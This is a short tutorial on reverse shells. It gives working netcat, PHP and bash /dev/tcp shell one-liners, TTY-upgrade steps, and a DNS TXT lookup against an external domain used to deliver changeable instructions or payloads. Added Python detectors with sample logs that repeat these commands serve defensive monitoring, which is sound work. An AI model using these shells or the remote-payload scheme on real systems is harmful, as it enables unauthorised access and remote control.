Crash Course on Reverse Shells
Set up a listener:
nc -lv 4444
Then connect back to that listener with either of the following (both point at 127.0.0.1:4444 to match the listener above):
php -r '$sock=fsockopen("127.0.0.1",4444);exec("/bin/bash -i <&3 >&3 2>&3");'
bash -c 'sh -i >& /dev/tcp/127.0.0.1/4444 0>&1' 2> /dev/null 1> /dev/null
Upgrading to Interactive Shell
Note: This will override Ctrl-Z and Ctrl-C, so that they occur in the remote shell.
Be prepared to lose the Terminal you opened.
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-256color
export SHELL=/bin/bash
Take note of the terminal size on the local machine:
stty size
Background your listener with Ctrl-Z and then bring the process back to the foreground:
stty raw -echo;fg
You may want to run reset afterwards (if you didn't set the right TERM variable, it will prompt you for one).
And set the terminal size in the remote shell to the values you noted:
stty rows <ROWS> columns <COLS>
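Seen from the other side, the sequence above (a shell bound to a socket, then a pty spawn and stty raw -echo) leaves a recognisable trail in process-execution telemetry. The following script is an added example and not part of the original notes: it scans a constructed auditd-style execve log for those command-line patterns and reports which users show both a socket-backed shell and a terminal-upgrade step. The one-line record format, the rule names and the sample records are assumptions made for this example.

```python
import re
from typing import Dict, List, Set

# Constructed sample of process-execution records (auditd-style execve
# summaries flattened to one line each). Made up for this example, not taken
# from any real host; 203.0.113.5 is a documentation address.
SAMPLE_EXEC_LOG = """\
uid=1000 exe=/usr/bin/php cmd=php -r $sock=fsockopen("203.0.113.5",4444);exec("/bin/bash -i <&3 >&3 2>&3");
uid=33 exe=/bin/bash cmd=bash -c sh -i >& /dev/tcp/203.0.113.5/4444 0>&1
uid=1000 exe=/usr/bin/python3 cmd=python3 -c import pty;pty.spawn("/bin/bash")
uid=0 exe=/usr/bin/stty cmd=stty raw -echo
uid=1000 exe=/usr/bin/python3 cmd=python3 manage.py runserver
uid=1000 exe=/usr/bin/nc cmd=nc -lv 4444
uid=1000 exe=/bin/bash cmd=bash -c tar czf backup.tgz /var/www
"""

# Assumed record layout: uid=<uid> exe=<path> cmd=<full command line>
RECORD_RE = re.compile(r"^uid=(\S+) exe=(\S+) cmd=(.*)$")

# Rule name -> pattern over the command line. Each one corresponds to a step
# of the reverse-shell / interactive-upgrade sequence described in the notes.
RULES = {
    "bash-dev-tcp": re.compile(r"/dev/(?:tcp|udp)/\d{1,3}(?:\.\d{1,3}){3}/\d+"),
    "php-socket-exec": re.compile(r"fsockopen\(.*\).*(?:exec|system|shell_exec|popen)\("),
    "pty-spawn": re.compile(r"pty\.spawn\("),
    "tty-raw-noecho": re.compile(r"\bstty\s+raw\s+-echo\b"),
    # A local listener is also used legitimately; treat it as context, not proof.
    "listener": re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-l"),
}

# Rules that indicate a shell bound to a socket, and rules that indicate the
# shell is being upgraded to a full terminal.
SOCKET_SHELL_RULES = {"bash-dev-tcp", "php-socket-exec"}
UPGRADE_RULES = {"pty-spawn", "tty-raw-noecho"}


def scan_exec_log(text: str) -> List[Dict[str, str]]:
    """Return one finding per (record, rule) match, in log order."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        m = RECORD_RE.match(line)
        if not m:
            continue  # skip records we cannot parse rather than guessing
        uid, exe, cmd = m.groups()
        for rule, pattern in RULES.items():
            if pattern.search(cmd):
                findings.append({"line": line_no, "uid": uid, "exe": exe,
                                 "rule": rule, "cmd": cmd})
    return findings


def upgraded_shell_uids(findings: List[Dict[str, str]]) -> Set[str]:
    """Uids that show both a socket-backed shell and a terminal-upgrade step."""
    by_uid: Dict[str, Set[str]] = {}
    for f in findings:
        by_uid.setdefault(f["uid"], set()).add(f["rule"])
    return {uid for uid, rules in by_uid.items()
            if rules & SOCKET_SHELL_RULES and rules & UPGRADE_RULES}


if __name__ == "__main__":
    hits = scan_exec_log(SAMPLE_EXEC_LOG)
    for h in hits:
        print(f"line {h['line']:>2} uid={h['uid']:<5} {h['rule']:<16} {h['cmd']}")
    print("uids with socket shell + tty upgrade:", sorted(upgraded_shell_uids(hits)))
```

The per-rule hits are deliberately kept separate from the correlation step: a lone stty raw -echo or nc -l is common administrative activity, while the same uid producing a socket-backed shell and a pty upgrade within one log is what a responder would actually page on.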
A script that reads its instructions from a DNS TXT record can have its behaviour updated in real time: change the record, and the script picks up the new content the next time it parses it.
nslookup "-q=txt" omg.foolsnasty.com | grep -e "\"*\""
I suppose that in a similar fashion, one can just host the payload on some server in text form and swap out the file that way instead.
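The polling behaviour described above is also what a defender can look for: a client that re-queries the same TXT name at a steady interval. The script below is an added example (not from the original notes) that parses a constructed resolver query log, skips TXT names that mail and certificate tooling legitimately look up, and flags client/name pairs with repeated, evenly spaced TXT queries. The log line format, the benign label list and the thresholds are assumptions made for this example.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev
from typing import Dict, List

# Constructed resolver query log (made up for this example, not from a real
# network). One query per line: timestamp, client, query type, query name.
SAMPLE_DNS_LOG = """\
2024-05-01 10:00:00 client=10.0.0.7 qtype=TXT qname=tasks.example.test
2024-05-01 10:00:05 client=10.0.0.9 qtype=TXT qname=_dmarc.example.org
2024-05-01 10:00:12 client=10.0.0.9 qtype=A qname=www.example.org
2024-05-01 10:00:30 client=10.0.0.7 qtype=TXT qname=tasks.example.test
2024-05-01 10:00:40 client=10.0.0.9 qtype=TXT qname=example.org
2024-05-01 10:01:00 client=10.0.0.7 qtype=TXT qname=tasks.example.test
2024-05-01 10:01:30 client=10.0.0.7 qtype=TXT qname=tasks.example.test
2024-05-01 10:02:00 client=10.0.0.7 qtype=TXT qname=tasks.example.test
2024-05-01 10:20:40 client=10.0.0.9 qtype=TXT qname=example.org
"""

# Assumed line layout: "<date> <time> client=<ip> qtype=<type> qname=<name>"
LINE_RE = re.compile(r"^(\S+ \S+) client=(\S+) qtype=(\S+) qname=(\S+)$")

# Labels that mark TXT names mail and certificate tooling looks up routinely;
# names containing them are skipped so the detector focuses on the rest.
BENIGN_TXT_LABELS = {"_dmarc", "_domainkey", "_acme-challenge", "_mta-sts"}

MIN_QUERIES = 4        # fewer repeats than this is not treated as polling
MAX_INTERVAL_CV = 0.2  # stddev/mean of the gaps; near-constant gaps look scripted


def parse_queries(text: str) -> List[Dict]:
    """Parse log lines into dicts; unparseable lines are skipped."""
    queries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, client, qtype, qname = m.groups()
        queries.append({
            "ts": datetime.fromisoformat(ts),
            "client": client,
            "qtype": qtype.upper(),
            "qname": qname.lower().rstrip("."),
        })
    return queries


def detect_txt_polling(text: str) -> List[Dict]:
    """Flag (client, name) pairs that query the same TXT record repeatedly at a steady interval."""
    groups = defaultdict(list)
    for q in parse_queries(text):
        if q["qtype"] != "TXT":
            continue
        if BENIGN_TXT_LABELS & set(q["qname"].split(".")):
            continue
        groups[(q["client"], q["qname"])].append(q["ts"])

    findings = []
    for (client, qname), stamps in groups.items():
        if len(stamps) < MIN_QUERIES:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue  # identical timestamps: a burst, not a schedule
        cv = pstdev(gaps) / avg
        if cv <= MAX_INTERVAL_CV:
            findings.append({"client": client, "qname": qname, "count": len(stamps),
                             "mean_interval_s": avg, "interval_cv": round(cv, 3)})
    return sorted(findings, key=lambda f: (f["client"], f["qname"]))


if __name__ == "__main__":
    for f in detect_txt_polling(SAMPLE_DNS_LOG):
        print(f"{f['client']} polls TXT {f['qname']} {f['count']}x, "
              f"every {f['mean_interval_s']:.0f}s (cv={f['interval_cv']})")
```

The regularity check matters more than the raw count: SPF and DMARC lookups also repeat, but they follow mail flow rather than a timer, which is why those labels are excluded and why the coefficient of variation of the gaps is the deciding signal rather than volume alone.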